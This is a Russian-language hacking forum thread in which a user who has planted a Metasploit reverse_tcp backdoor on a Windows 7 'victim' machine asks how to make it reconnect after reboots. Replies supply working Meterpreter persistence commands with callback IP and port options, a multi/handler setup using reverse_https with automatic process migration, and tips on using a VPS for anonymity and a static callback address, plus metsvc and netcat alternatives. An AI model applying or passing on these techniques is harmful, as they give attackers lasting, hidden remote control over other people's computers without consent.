Доброго времени суток! Собственно столкнулся с проблемой - после формирования полезной нагрузки (reverse_tcp) и доставки на целевую машину(Win 7) вбиваю msf->use exploit/multi/handler - установка IP и порта 4444 - и вуаля - сессия установлена! НО! В случае дисконнекта целевой машины (резет/выключение) - сессию получается восстановить только повторным запуском пэйлоуда. Попробовал прицепить бэкдор к разным процессам (migrate) - цепляется но после перезагрузки не создается сессия. Прописал в автозагрузку через реестр - таже петрушка, попробовал сделать через планировщик задач Вин - при запуске системы - не работает, при этом в журнале отображается как отработавшая задача.
Метасплоит стоит на ВДС, целевая тачка - в сети вероятно с динамическим IP, про проброс порта забыл((((
Какие варианты можете посоветовать, чтобы при запуске системы был бэкконнект?
Заранее благодарен

Друг, как только сессия появилась на вражеской машине тебе нужно в метерпреторе сделать persistence это спец функция метерпретора что бы не потерять машину(вражескую) машину после дислокации смены IP и конечно же перезагрузки, а лучше сразу прописать в метасплойте автоперсистенс это позволяет твоему трояну сделать все автоматически то есть закрепится в системе навсегда если конечно же его не спалит антивирь так же есть функция миграте но это уже другая история на webware есть замечательная стать про метерпретор рекомендую ее прочитать а так же плотно изучить все его функции!

Я пробовал persistence на виртуалке, попробую на целевой тачке...Чет вылетело из головы. Спс за подсказку
Так пойдет - meterpreter >run persistence –A –L c:\\ -X 30 –p 443 –r 192.168.1.113?
После ключа L указывать место расположение бэкдора в системе?

и еще важный момент который я упусти у тебя должен быть постоянный ip либо днс тоесть пользуйся сервисом noip(это проброс портов и т.д.) но я рекомендую использовать VPS! у него есть масса плюсов 1) анонимность 2) постоянный ip , да и много чего..
Поясняю если ты вбил в троян стучать на твой локальный ip который начинается на 192.168........ у тебя будет все работать тольько в локальной(местной) сети но как только жертва от нее уйдет сессии не будет! троян будет отстукивать но кому то другому с таким же адресом..
ПС у меня мечта завлодеть постоянными IP такие как 192.168.1.~ и т.д.))) и ломать ничего не нужно сами все стучатся!)))
[doublepost=1497445759,1497445527][/doublepost]

можно и так run persistence -U -i 60<--(время отстука домой в секундах) -p 443 -r твой IP и смотри чтобы твой роутер не поменял тебе твой же ip

Я образно указал этот адрес) У меня на ВДС со статикой с метасплойтом) Вопрос еще по поводу пути - указывать полный путь до бэкдора? Ща скину скрин с ошибкой(

возможно у жертвы фаервол,тогда миграция или пробуй metsvc сервис!

Вроде получилось

а по пробуй-ка автомиграт и автоперсистенс, а если это не поможет тогда netcat
[doublepost=1497458817,1497447393][/doublepost]Automigrate

msf>use exploit/multi/handler

msf>set payload windows/meterpreter/reverse_https

msf>set AutoRunScript post/windows/manage/migrate

msf>set lhost

msf> set lport

msf>exploit

этот пост тоже почитай пригодится!

Блин - при запуске Venom вылезла ошибка
Как ее победить?

Буду признателен за любые мысли

https://forum.antichat.xyz/attachmen...52a037135a.png

а вы из под sudo запустили если да то это ruby дурит голову.... обновите ОС если проблема не решилась велкам))